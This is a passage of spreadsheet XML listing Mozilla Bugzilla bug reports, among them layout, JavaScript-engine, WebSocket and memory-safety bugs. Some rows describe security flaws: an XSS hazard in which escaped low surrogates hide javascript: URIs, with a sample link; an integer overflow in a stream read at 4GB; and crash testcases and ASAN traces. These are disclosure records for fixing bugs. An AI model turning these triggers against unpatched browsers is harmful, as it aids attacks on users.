          <t>Layout</t>
        </is>
      </c>
      <c r="K3359" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3359" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3359" t="inlineStr">
        <is>
          <t>Windows 95</t>
        </is>
      </c>
      <c r="N3359" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3359" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3359" t="inlineStr">
        <is>
          <t>FIX IN HAND</t>
        </is>
      </c>
      <c r="Q3359" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3359" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3359" t="inlineStr">
        <is>
          <t>M17</t>
        </is>
      </c>
      <c r="T3359" t="n">
        <v>1</v>
      </c>
      <c r="U3359" t="n">
        <v>0</v>
      </c>
      <c r="V3359" t="n">
        <v>29</v>
      </c>
      <c r="W3359" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/4.72 [en] (Win95; U)
BuildID:    2000022820
When a block of text is marked with a paragraph tag inside a span with its style 
set to relative positioning, Mozilla does not display its text.  However, it 
seems to have been properly laid out on the screen: hyperlinks in the included 
text are accessible, and the cursor changes shape when it moves over the 
(invisible) text area.
Reproducible: Always
Steps to Reproduce:
1. Open Mozilla
2. Go to the URL http://home.uchicago.edu/~sbjensen/Vanish.html
Actual Results:  The paragraph of text that is above the horizontal line is not 
visible.
Expected Results:  The paragraph should, in fact, be visible.
The following fragment is also available at the URL below.  It is just a 
stripped down version of the sample URL given above.
http://home.uchicago.edu/~sbjensen/Vanish1.html
&lt;HTML&gt;
&lt;BODY&gt;
&lt;SPAN STYLE="position:relative;"&gt;
&lt;P&gt;There is supposed to be a paragraph here, but it is not visible.
&lt;/SPAN&gt;
&lt;/BODY&gt;
&lt;/HTML&gt;</t>
        </is>
      </c>
      <c r="X3359" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3360">
      <c r="A3360" t="n">
        <v>754989</v>
      </c>
      <c r="B3360" t="inlineStr">
        <is>
          <t>2012-05-14 13:04:35 -0700</t>
        </is>
      </c>
      <c r="C3360" t="inlineStr">
        <is>
          <t>Nuke dead cross-compartment wrappers during brain transplant</t>
        </is>
      </c>
      <c r="D3360" t="inlineStr">
        <is>
          <t>2015-10-16 11:48:55 -0700</t>
        </is>
      </c>
      <c r="E3360" t="n">
        <v>1</v>
      </c>
      <c r="F3360" t="n">
        <v>1</v>
      </c>
      <c r="G3360" t="n">
        <v>3</v>
      </c>
      <c r="H3360" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3360" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3360" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3360" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3360" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3360" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3360" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3360" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3360" t="inlineStr">
        <is>
          <t>[js:p1:fx15][sg:critical][needs-branches][advisory-tracking+][qa?]</t>
        </is>
      </c>
      <c r="Q3360" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3360" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3360" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T3360" t="n">
        <v>1</v>
      </c>
      <c r="U3360" t="n">
        <v>0</v>
      </c>
      <c r="V3360" t="n">
        <v>27</v>
      </c>
      <c r="W3360" t="inlineStr">
        <is>
          <t>Created attachment 623782
patch
The basic way we do cross-compartment brain transplants is as follows:
For each wrapper W that points to the old object, wrap the new object in W's compartment (which returns a new wrapper W'), and swap the guts of W and W'.
When we're done with this, W' now holds the guts of W. The problem is that W' is still a cross-compartment wrapper, and it's no longer in the cross-compartment wrapper map. Normally everything works okay, because W' is unreachable and we'll never trace it again.
However, the conservative stack scanner could cause us to trace it again. And in that case, we can get into a lot of trouble. If we trace it after the thing it points to was collected in a compartment GC, then we're tracing into bad memory.
I found this because incremental GC seems to find a lot more of these dead wrappers and trace through them. I'm guessing they're getting caught in a write barrier somewhere.
I took advantage of some code that Kyle wrote to kill off a cross-compartment wrapper. I'm pretty sure that the nuke call for origobj is unnecessary, since I haven't ever seen it be a cross-compartment wrapper. But unless you know better, I figure it can't hurt.</t>
        </is>
      </c>
      <c r="X3360" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3361">
      <c r="A3361" t="n">
        <v>824856</v>
      </c>
      <c r="B3361" t="inlineStr">
        <is>
          <t>2012-12-26 16:20:06 -0800</t>
        </is>
      </c>
      <c r="C3361" t="inlineStr">
        <is>
          <t>Crash [@ QuoteString] or [@ js_NewStringCopyN] or "Assertion failure: limit &gt;= start,"</t>
        </is>
      </c>
      <c r="D3361" t="inlineStr">
        <is>
          <t>2013-11-25 13:26:47 -0800</t>
        </is>
      </c>
      <c r="E3361" t="n">
        <v>1</v>
      </c>
      <c r="F3361" t="n">
        <v>1</v>
      </c>
      <c r="G3361" t="n">
        <v>3</v>
      </c>
      <c r="H3361" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3361" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3361" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3361" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3361" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3361" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3361" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3361" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3361" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main20+]</t>
        </is>
      </c>
      <c r="Q3361" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3361" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3361" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T3361" t="n">
        <v>1</v>
      </c>
      <c r="U3361" t="n">
        <v>0</v>
      </c>
      <c r="V3361" t="n">
        <v>27</v>
      </c>
      <c r="W3361" t="inlineStr">
        <is>
          <t>Created attachment 695866
stack
"xy".match(/((x)??){2}y/)
asserts js debug shell on m-c changeset f5ed2691d901 without any CLI arguments at Assertion failure: limit &gt;= start,
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   116360:cd2eb9705765
user:        Gary Kwong
date:        Mon Dec 17 16:57:48 2012 -0800
summary:     Workaround YARR assert (bug 808478, r=sstangl).
I forgot to set the actual patch author when I was helping to land the patch in bug 808478. :-/ The original patch author was dvander.
Prior to that changeset, the testcase was asserting at Assertion failure: (&amp;term - term.atom.parenthesesWidth)-&gt;inputPosition == term.inputPosition, which bug 808478 worked around.
This seems to be asserting in our regex code instead of YARR code. The original assert was added in bug 673188. I'm not sure though.</t>
        </is>
      </c>
      <c r="X3361" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3362">
      <c r="A3362" t="n">
        <v>1186160</v>
      </c>
      <c r="B3362" t="inlineStr">
        <is>
          <t>2015-07-21 13:17:59 -0700</t>
        </is>
      </c>
      <c r="C3362" t="inlineStr">
        <is>
          <t>WebSocketChannel accesses nsDocShell and nsDocument off the main thread</t>
        </is>
      </c>
      <c r="D3362" t="inlineStr">
        <is>
          <t>2016-07-02 11:09:07 -0700</t>
        </is>
      </c>
      <c r="E3362" t="n">
        <v>1</v>
      </c>
      <c r="F3362" t="n">
        <v>1</v>
      </c>
      <c r="G3362" t="n">
        <v>3</v>
      </c>
      <c r="H3362" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3362" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3362" t="inlineStr">
        <is>
          <t>Networking: WebSockets</t>
        </is>
      </c>
      <c r="K3362" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3362" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3362" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3362" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3362" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3362" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main42+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q3362" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3362" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3362" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T3362" t="n">
        <v>1</v>
      </c>
      <c r="U3362" t="n">
        <v>0</v>
      </c>
      <c r="V3362" t="n">
        <v>49</v>
      </c>
      <c r="W3362" t="inlineStr">
        <is>
          <t>Tracy pointed out that NS_CycleCollectorSuspect3 is the number #21 crash on Firefox 40 beta. I looked at a dozen of the crash reports and they all have stacks like this:
NS_CycleCollectorSuspect3
nsHTMLDocument::AddRef()
nsCOMPtr&lt;nsNavHistoryQueryOptions&gt;::nsCOMPtr&lt;nsNavHistoryQueryOptions&gt;(nsNavHistoryQueryOptions*)
nsDocShell::ShouldPrepareForIntercept(nsIURI*, bool, bool*)
mozilla::net::HttpBaseChannel::ShouldIntercept()
mozilla::net::nsHttpChannel::AsyncOpen(nsIStreamListener*, nsISupports*)
mozilla::net::WebSocketChannel::BeginOpenInternal()
mozilla::net::WebSocketChannel::BeginOpen(bool)
mozilla::net::WebSocketChannel::Notify(nsITimer*)
This is off the main thread.
Some reports:
https://crash-stats.mozilla.com/report/index/9ebb3224-6e42-40b2-887a-beea82150717
https://crash-stats.mozilla.com/report/index/727f35a4-122a-4f32-8582-1d8152150718
https://crash-stats.mozilla.com/report/index/ea6c598d-0794-483b-a6a2-deb252150716
https://crash-stats.mozilla.com/report/index/68840357-f4b8-4400-a1bc-afc342150717</t>
        </is>
      </c>
      <c r="X3362" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3363">
      <c r="A3363" t="n">
        <v>448166</v>
      </c>
      <c r="B3363" t="inlineStr">
        <is>
          <t>2008-07-26 22:35:07 -0700</t>
        </is>
      </c>
      <c r="C3363" t="inlineStr">
        <is>
          <t>escaped low surrogates possible XSS hazard in URIs</t>
        </is>
      </c>
      <c r="D3363" t="inlineStr">
        <is>
          <t>2009-02-21 09:23:23 -0800</t>
        </is>
      </c>
      <c r="E3363" t="n">
        <v>1</v>
      </c>
      <c r="F3363" t="n">
        <v>1</v>
      </c>
      <c r="G3363" t="n">
        <v>3</v>
      </c>
      <c r="H3363" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3363" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3363" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K3363" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L3363" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3363" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3363" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3363" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3363" t="inlineStr">
        <is>
          <t>[sg:low]</t>
        </is>
      </c>
      <c r="Q3363" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3363" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3363" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3363" t="n">
        <v>1</v>
      </c>
      <c r="U3363" t="n">
        <v>0</v>
      </c>
      <c r="V3363" t="n">
        <v>6</v>
      </c>
      <c r="W3363" t="inlineStr">
        <is>
          <t>On "The Scanner" blog Gareth noticed that html-escaped low surrogates in javascript uris were ignored as if they weren't there, a possible XSS hazard if sites don't recognize javascript: links.
http://www.thespanner.co.uk/2008/06/30/javascript-protocol-fuzz-results/
This works in the latest Firefox 2.0.0.16 but not Firefox 3. The trunk did get a fix for bug 316394 but that's in CSS and wouldn't have fixed this I don't think. Putting escaped low surrogates into HTML elements correctly leads to unknown tags (e.g. &lt;scr&amp;#xdc00;ipt&gt; doesn't work).
&lt;a href="http://www.moz&amp;#xdc00;illa.com"&gt;shouldn't be mozilla&lt;/a&gt;</t>
        </is>
      </c>
      <c r="X3363" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3364">
      <c r="A3364" t="n">
        <v>716556</v>
      </c>
      <c r="B3364" t="inlineStr">
        <is>
          <t>2012-01-09 08:15:57 -0800</t>
        </is>
      </c>
      <c r="C3364" t="inlineStr">
        <is>
          <t>Potential buffer overflow in nsScriptableInputStream::Read with 4GB data</t>
        </is>
      </c>
      <c r="D3364" t="inlineStr">
        <is>
          <t>2015-10-16 11:52:04 -0700</t>
        </is>
      </c>
      <c r="E3364" t="n">
        <v>1</v>
      </c>
      <c r="F3364" t="n">
        <v>1</v>
      </c>
      <c r="G3364" t="n">
        <v>3</v>
      </c>
      <c r="H3364" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3364" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3364" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K3364" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3364" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3364" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3364" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3364" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3364" t="inlineStr">
        <is>
          <t>[sg:moderate][qa-]</t>
        </is>
      </c>
      <c r="Q3364" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3364" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3364" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T3364" t="n">
        <v>1</v>
      </c>
      <c r="U3364" t="n">
        <v>0</v>
      </c>
      <c r="V3364" t="n">
        <v>26</v>
      </c>
      <c r="W3364" t="inlineStr">
        <is>
          <t>NS_IMETHODIMP
nsScriptableInputStream::Read(PRUint32 aCount, char **_retval) {
    nsresult rv = NS_OK;
    PRUint32 count = 0;
    char *buffer = nsnull;
    if (!mInputStream) return NS_ERROR_NOT_INITIALIZED;
    rv = mInputStream-&gt;Available(&amp;count);
    if (NS_FAILED(rv)) return rv;
    count = NS_MIN(count, aCount);
    buffer = (char*)nsMemory::Alloc(count+1); // make room for '\0'
    if (!buffer) return NS_ERROR_OUT_OF_MEMORY;
- have mInputStream having exactly 4GB of data, its available will return PR_UINT32_MAX
- try to read all this 4GB of data with the scriptable stream
- count+1 will evaluate as 0
It is not well defined what result of malloc (if nsMemory::Alloc resolve to it) is with 0 as an arg.
So, we may potentially get an invalid pointer and write to it.</t>
        </is>
      </c>
      <c r="X3364" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3365">
      <c r="A3365" t="n">
        <v>664837</v>
      </c>
      <c r="B3365" t="inlineStr">
        <is>
          <t>2011-06-16 14:12:47 -0700</t>
        </is>
      </c>
      <c r="C3365" t="inlineStr">
        <is>
          <t>[Fx5Launch][Mobile] Update mobile/FAQ to reflect Firefox 5</t>
        </is>
      </c>
      <c r="D3365" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E3365" t="n">
        <v>1</v>
      </c>
      <c r="F3365" t="n">
        <v>1</v>
      </c>
      <c r="G3365" t="n">
        <v>5</v>
      </c>
      <c r="H3365" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3365" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J3365" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3365" t="inlineStr">
        <is>
          <t>Firefox 5</t>
        </is>
      </c>
      <c r="L3365" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3365" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3365" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3365" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3365" t="inlineStr"/>
      <c r="Q3365" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3365" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3365" t="inlineStr">
        <is>
          <t>2.9</t>
        </is>
      </c>
      <c r="T3365" t="n">
        <v>1</v>
      </c>
      <c r="U3365" t="n">
        <v>0</v>
      </c>
      <c r="V3365" t="n">
        <v>9</v>
      </c>
      <c r="W3365" t="inlineStr">
        <is>
          <t>Apologies for this late copy update request. This has been a PR bug (662384) and now we need to get this implemented with WebDev.
We have a few updates to the copy that I will list below (also in the PR bug that I've listed under "depends")
++++++
1. Please change the "Security" section to "Privacy and Security"
2. Please add the following question and answer under the Privacy and Security section:
Q: How does Firefox protect my privacy?
A: Firefox for Android is the first mobile Web browser to offer the Do Not Track privacy feature to give you more control over the way your browsing behavior is tracked and used online. 
Q: How does Do Not Track work?
A: Do Not Track lets you tell websites that you want to opt-out of online behavioral tracking. To turn Do Not Track on, simply go to the Preferences option in Browser Tools on Firefox for Android and tap the box “tell sites not to track me."
When this option is selected "Yes," a HTTP header will be sent signaling to websites that you wish to opt-out of online behavioral tracking. You will not notice any difference in your browsing experience until sites and advertisers start responding to the header. Visit the Mozilla Do Not Track site for more info. 
3. Please remove "and Maemo" from the second question in the "About Firefox"  section entitled "How is Firefox different than the mobile browser I have now?"
4. In the third question in "About Firefox" entitled "Is Firefox Available for my phone," Change (2.0 and above) to (2.1 and above) and remove "and Nokia Maemo devices (Nokia N900)"
5. Under the "Downloading" section, change the first sentence of the question "Is Firefox available for my phone" from "Firefox is available for download on Google Android (2.0 and above) and Nokia Maemo devices." to "Firefox is available for download on Google Android 2.1 and above."
6. Under the "Using Firefox" section "How do I zoom in and out?" question, remove "On your Nokia N900, double tap the screen or use the volume rocker to zoom in and out." 
7.Please change the answer to the last question of the "Features" section from "Firefox 4 for Android and Maemo does not currently support the Flash plugin." to "Firefox for Android does not currently support the Flash plugin."
8. Remove "4" from question "What JavaScript engine does Firefox use?" in the "Developer Questions" section.
9. update "devies" to "devices" in the answer for this question:
Will Firefox be available on other mobile devices or platforms?
Due to platform or distribution restrictions, Mozilla is unable to bring the full Firefox browser to Blackberry, Symbian and iOS (iPhone, iPod Touch). We're working to bring Firefox Home to to to other devies and platforms in the future so that users can access their Firefox data wherever they go. Learn more.
Thanks!</t>
        </is>
      </c>
      <c r="X3365" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3366">
      <c r="A3366" t="n">
        <v>613571</v>
      </c>
      <c r="B3366" t="inlineStr">
        <is>
          <t>2010-11-19 12:53:14 -0800</t>
        </is>
      </c>
      <c r="C3366" t="inlineStr">
        <is>
          <t>tracking bug for build and release of firefox 3.6.13</t>
        </is>
      </c>
      <c r="D3366" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3366" t="n">
        <v>1</v>
      </c>
      <c r="F3366" t="n">
        <v>1</v>
      </c>
      <c r="G3366" t="n">
        <v>5</v>
      </c>
      <c r="H3366" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3366" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3366" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3366" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3366" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3366" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3366" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3366" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3366" t="inlineStr"/>
      <c r="Q3366" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3366" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3366" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3366" t="n">
        <v>1</v>
      </c>
      <c r="U3366" t="n">
        <v>0</v>
      </c>
      <c r="V3366" t="n">
        <v>26</v>
      </c>
      <c r="W3366" t="inlineStr">
        <is>
          <t>Created attachment 491923
3.6.13 release config
This buildbot-configs patch sets up the release config for 3.6.13 and enables releases on pm01 and pm03, which are the only masters we can run releases on right now (because bm01/02 don't have any Macs).</t>
        </is>
      </c>
      <c r="X3366" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3367">
      <c r="A3367" t="n">
        <v>1685145</v>
      </c>
      <c r="B3367" t="inlineStr">
        <is>
          <t>2021-01-05 11:25:43 -0800</t>
        </is>
      </c>
      <c r="C3367" t="inlineStr">
        <is>
          <t>attempting to call malloc_usable_size() for pointer which is not owned</t>
        </is>
      </c>
      <c r="D3367" t="inlineStr">
        <is>
          <t>2024-05-30 10:25:49 -0700</t>
        </is>
      </c>
      <c r="E3367" t="n">
        <v>1</v>
      </c>
      <c r="F3367" t="n">
        <v>1</v>
      </c>
      <c r="G3367" t="n">
        <v>3</v>
      </c>
      <c r="H3367" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3367" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3367" t="inlineStr">
        <is>
          <t>Graphics: WebRender</t>
        </is>
      </c>
      <c r="K3367" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3367" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M3367" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3367" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3367" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3367" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main86+]</t>
        </is>
      </c>
      <c r="Q3367" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3367" t="inlineStr">
        <is>
          <t>S4</t>
        </is>
      </c>
      <c r="S3367" t="inlineStr">
        <is>
          <t>87 Branch</t>
        </is>
      </c>
      <c r="T3367" t="n">
        <v>1</v>
      </c>
      <c r="U3367" t="n">
        <v>0</v>
      </c>
      <c r="V3367" t="n">
        <v>8</v>
      </c>
      <c r="W3367" t="inlineStr">
        <is>
          <t>Install Firefox Nightly Build ID 20210105094403 (ASAN) and with a clean profile go to `about:memory` and tap measure. The browser crashes.
```
==209471==ERROR: AddressSanitizer: attempting to call malloc_usable_size() for pointer which is not owned: 0x000000000008
    #0 0x5631fe5372bd in malloc_usable_size /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:198:3
    #1 0x5631fe4bed92 in Unwind /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_stacktrace.h:115:5
    #2 0x5631fe4bed92 in __asan::asan_malloc_usable_size(void const*, unsigned long, unsigned long) /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_allocator.cpp:986:5
    #3 0x7f093fe8a876 in webrender::renderer::Renderer::size_of::hc672c0bdf48d101f /builds/worker/checkouts/gecko/gfx/wr/webrender/src/renderer/mod.rs:5302:18
    #4 0x7f093fe8a876 in webrender::renderer::Renderer::report_memory::h72205d5405f85baf /builds/worker/checkouts/gecko/gfx/wr/webrender/src/renderer/mod.rs:5314:36
    #5 0x7f093fe8a876 in wr_renderer_accumulate_memory_report /builds/worker/checkouts/gecko/gfx/webrender_bindings/src/bindings.rs:788:16
    #6 0x7f09333f6c61 in AccumulateMemoryReport /builds/worker/checkouts/gecko/gfx/webrender_bindings/RendererOGL.cpp:412:3
    #7 0x7f09333f6c61 in mozilla::wr::RenderThread::DoAccumulateMemoryReport(mozilla::wr::MemoryReport, RefPtr&lt;mozilla::MozPromise&lt;mozilla::wr::MemoryReport, bool, true&gt;::Private&gt; const&amp;) /builds/worker/checkouts/gecko/gfx/webrender_bindings/RenderThread.cpp:167:15
    #8 0x7f093340bdfa in applyImpl&lt;mozilla::wr::RenderThread, void (mozilla::wr::RenderThread::*)(mozilla::wr::MemoryReport, const RefPtr&lt;mozilla::MozPromise&lt;mozilla::wr::MemoryReport, bool, true&gt;::Private&gt; &amp;), StoreCopyPassByConstLRef&lt;mozilla::wr::MemoryReport&gt;, StoreRefPtrPassByPtr&lt;mozilla::MozPromise&lt;mozilla::wr::MemoryReport, bool, true&gt;::Private&gt; , 0, 1&gt; /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1148:12
    #9 0x7f093340bdfa in apply&lt;mozilla::wr::RenderThread, void (mozilla::wr::RenderThread::*)(mozilla::wr::MemoryReport, const RefPtr&lt;mozilla::MozPromise&lt;mozilla::wr::MemoryReport, bool, true&gt;::Private&gt; &amp;)&gt; /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1154:12
    #10 0x7f093340bdfa in mozilla::detail::RunnableMethodImpl&lt;mozilla::wr::RenderThread*, void (mozilla::wr::RenderThread::*)(mozilla::wr::MemoryReport, RefPtr&lt;mozilla::MozPromise&lt;mozilla::wr::MemoryReport, bool, true&gt;::Private&gt; const&amp;), true, (mozilla::RunnableKind)0, mozilla::wr::MemoryReport, RefPtr&lt;mozilla::MozPromise&lt;mozilla::wr::MemoryReport, bool, true&gt;::Private&gt; &gt;::Run() /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1201:13
    #11 0x7f093161c003 in RunTask /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:465:9
    #12 0x7f093161c003 in MessageLoop::DeferOrRunPendingTask(MessageLoop::PendingTask&amp;&amp;) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:473:5
    #13 0x7f093161d73b in MessageLoop::DoWork() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:548:13
    #14 0x7f093161f009 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_pump_default.cc:35:31
    #15 0x7f093161a592 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:334:10
    #16 0x7f093161a592 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:327:3
    #17 0x7f093161a592 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:309:3
    #18 0x7f0931639ddb in base::Thread::ThreadMain() /builds/worker/checkouts/gecko/ipc/chromium/src/base/thread.cc:191:16
    #19 0x7f093163096c in ThreadFunc(void*) /builds/worker/checkouts/gecko/ipc/chromium/src/base/platform_thread_posix.cc:40:13
    #20 0x7f09478b8431 in start_thread (/lib64/libpthread.so.0+0x9431)
    #21 0x7f0947481912 in clone (/lib64/libc.so.6+0x101912)
Address 0x000000000008 is a wild pointer.
SUMMARY: AddressSanitizer: bad-malloc_usable_size /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:198:3 in malloc_usable_size
Thread T22 (Renderer) created by T0 here:
    #0 0x5631fe52135a in pthread_create /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cpp:214:3
    #1 0x7f093162a48c in CreateThread /builds/worker/checkouts/gecko/ipc/chromium/src/base/platform_thread_posix.cc:123:14
    #2 0x7f093162a48c in PlatformThread::Create(unsigned long, PlatformThread::Delegate*, unsigned long*) /builds/worker/checkouts/gecko/ipc/chromium/src/base/platform_thread_posix.cc:134:10
    #3 0x7f093163942e in base::Thread::StartWithOptions(base::Thread::Options const&amp;) /builds/worker/checkouts/gecko/ipc/chromium/src/base/thread.cc:97:8
    #4 0x7f09333f5290 in mozilla::wr::RenderThread::Start() /builds/worker/checkouts/gecko/gfx/webrender_bindings/RenderThread.cpp:90:16
    #5 0x7f093314ced1 in gfxPlatform::InitLayersIPC() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:1336:7
    #6 0x7f093314855d in gfxPlatform::Init() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:976:3
